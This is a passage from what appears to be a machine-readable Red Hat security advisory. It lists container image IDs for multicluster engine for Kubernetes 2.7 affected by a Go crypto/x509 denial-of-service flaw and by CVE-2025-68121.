"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
